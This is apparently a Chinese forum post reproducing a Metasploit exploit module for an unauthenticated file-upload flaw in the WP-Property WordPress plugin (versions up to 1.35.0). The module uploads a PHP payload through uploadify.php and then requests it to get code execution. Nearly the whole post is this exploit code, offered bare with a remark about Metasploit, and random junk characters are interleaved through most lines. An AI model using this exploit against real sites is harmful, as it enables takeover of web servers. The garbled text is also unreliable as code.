WordPress WP-Property PHP 文件上传漏洞
7 u7 |9 K9 s7 ]! @
1 s1 p7 P. y* u) @. ~+ }# V& p ## # This file is part of the Metasploit Framework and may be subject to
% I, c* Z& I, ~0 z' n- B% c9 K. W/ i+ l+ ]& p B" |
# redistribution and commercial restrictions. Please see the Metasploit; ]+ u8 C- K5 [. k
7 l1 q o4 q' Q: y o+ n# Framework web site for more information on licensing and terms of use.
) R+ E; h+ [+ s% U/ T! ?
- c- G. m, C5 z0 ^, F# http://metasploit.com/framework/ ##) r! m; X% p5 z( M# A2 h
1 {1 _1 i/ q8 \ ]) R. N4 e/ D 0 w9 M8 l, y8 X1 b* x
2 x4 U0 V) O9 i) p* J
9 X3 A4 Q1 i$ Q" N9 k0 m5 j2 d/ P a- @. r
require 'msf/core'
, E1 O0 j8 L0 x# rrequire 'msf/core/exploit/php_exe'
8 x P; n) E, I& `4 }2 t f, d
; x% L" r2 u8 rclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
* r1 ?9 N, ~6 `, l6 b" `'Description' => %q{
7 M% G5 _; y# P; ZThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
: g: W% V) ] R+ x2 B[' C0 p5 X& z, F
'Sammy FORGIT', # initial discovery
; f1 e& ?6 b! ['James Fitts <fitts.james[at]gmail.com>' # metasploit module8 J. [0 u% U, D' n8 V5 G- {
],. J4 K( g5 z( d+ k8 [, O
'License' => MSF_LICENSE,
2 b2 s; w1 I1 G u# U1 E, z'References' =>2 q. @1 a* A* r" N; ?9 a4 A; o9 N
[
' |* k9 ?/ ?. _- c[ 'OSVDB', '82656' ],6 {, h6 o f- m) t! r( r
[ 'BID', '53787' ],
0 i1 `, m% o4 P/ X+ T) I2 u[ 'EDB', '18987'],
6 l [& L7 S6 {5 S* m8 k8 Y[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
: \& S+ ^* z! Y, |1 T],: y$ @! X5 j6 X: o' C% M7 ]
'Payload' =>- U5 U) v/ G' R9 p2 i1 ]+ N8 _
{
( q& p/ t' H8 B, U" f( k9 u7 \6 ^'BadChars' => "\x00",: `2 Q8 t1 m( b1 \3 B) u
},- _) t6 y, M: h$ f' k* G/ ]
'Platform' => 'php',
+ x( D" Y P3 S4 a% ]'Arch' => ARCH_PHP,
5 m# h4 F1 [! P7 i1 t' ~# M) t- n'Targets' =>
5 x: p. L9 ^' Q& e) E[
: Y; k/ b9 ?4 [% x* \& C[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],, |! X& z# D1 Y/ A# i( w* k0 x
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
' O# g4 w8 j3 U: g1 @$ I; S7 c],& v6 [3 }) H0 y& o |
'DefaultTarget' => 0,
$ h m- t$ `: l8 i* n+ X2 x) |, C'DisclosureDate' => 'Mar 26 2012'))6 r \6 F3 I6 D) @
( o# H) z! h8 T8 f5 M4 dregister_options(- ?( T8 ]0 Y3 _4 K
[6 o% y& v; I5 I; o; T4 L# [
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. ^# ^9 q( p! o6 x+ ?], self.class)
) ]2 v3 W8 W) t( U* `end/ q' u' |, u/ L' C3 _
{% ^9 v* A- i2 M: _6 M9 Ddef check* Z) H; a* g' Z2 P; ^% ~# |7 [
uri = target_uri.path* k3 E) E4 R1 v1 o2 l8 N+ i8 u
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',+ Q* Z, I/ u. o! i& _6 g2 o
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"; j5 G* i* u( W6 Q
})% G" h8 v4 p! X' i7 t. j& f' E
' L, e- L; X" Nif not res or res.code != 200" N% r9 O2 ^7 g/ O1 F i8 K1 E
return Exploit::CheckCode::Unknown2 ?, O2 I6 d1 x) \7 V; c
end
8 J7 }2 J" y3 R( o+ j0 I" R+ B( N# L- P" m: ~* C
return Exploit::CheckCode::Appears0 d9 P1 L+ J/ ^% A9 Y5 G& \4 a
end
: h6 T- `' }) o+ w1 s) k* w" q+ k+ l9 H6 E% _2 w
def exploit
! v t3 ^' L3 h9 Duri = target_uri.path
2 q( k' Z2 c1 r& ~uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
' t8 u8 G0 y& R+ @3 f% ]6 ?2 M
+ j( y0 {; J4 {$ J2 i% ~data = Rex::MIME::Message.new
4 x% I7 ]$ w9 p! Z: h( P% g fdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
( w' u9 o$ W" s) p1 @! tdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
/ _) C- \6 a0 ^# |+ Jpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
, K1 r. ^2 n1 z y+ M5 Y; v: l( J1 U8 x$ L) m2 S# v
print_status("#{peer} - Uploading payload #{@payload_name}")
3 O$ t+ Y$ Q) S! M0 T" Ires = send_request_cgi({
0 i7 [8 e8 j2 Z) `" m. ?'method' => 'POST',
& I# |* @, o" b ]'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",2 `( x. p0 L# J6 j ~
'ctype' => "multipart/form-data; boundary=#{data.bound}",- X4 U+ f3 X1 X
'data' => post_data
) A0 P# A1 T% R- M) s}), o& u0 l3 R' x, f. d! I* @; d: X
; r: z* X& i! A
if not res or res.code != 200 or res.body !~ /#{@payload_name}/; K# H# b! A# N2 ]& z2 W5 b
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ o M; S- P0 s% \+ \5 ^0 K5 e: Send8 Z5 o0 }2 |( b$ C7 y5 Q: s
" m$ a* H( U6 a6 _! ~7 h; Dupload_uri = res.body
& V9 U( A( ?3 i; Y8 O
* R. } l7 K8 `6 ?# R& tprint_status("#{peer} - Executing payload #{@payload_name}")
W, s/ n' y8 t7 X+ e$ K; {res = send_request_raw({
6 h& u' {! M; {$ a0 J( s p'uri' => upload_uri,7 `8 ?' d6 W6 U6 @% z
'method' => 'GET'
4 ]. R. B8 z- q, n0 `})2 b8 O& b% D2 F& @
end. E) Q( y, A4 @$ H+ T4 h! r7 ?
end
5 O: Y+ a+ `' L, e
' b. s9 A n+ p" G( U: ~不要问我这写的是什么 怎么利用 我是说msf.
1 t" H/ N7 ?) Z3 i' W# U# a4 C! I5 ~: i4 w S
|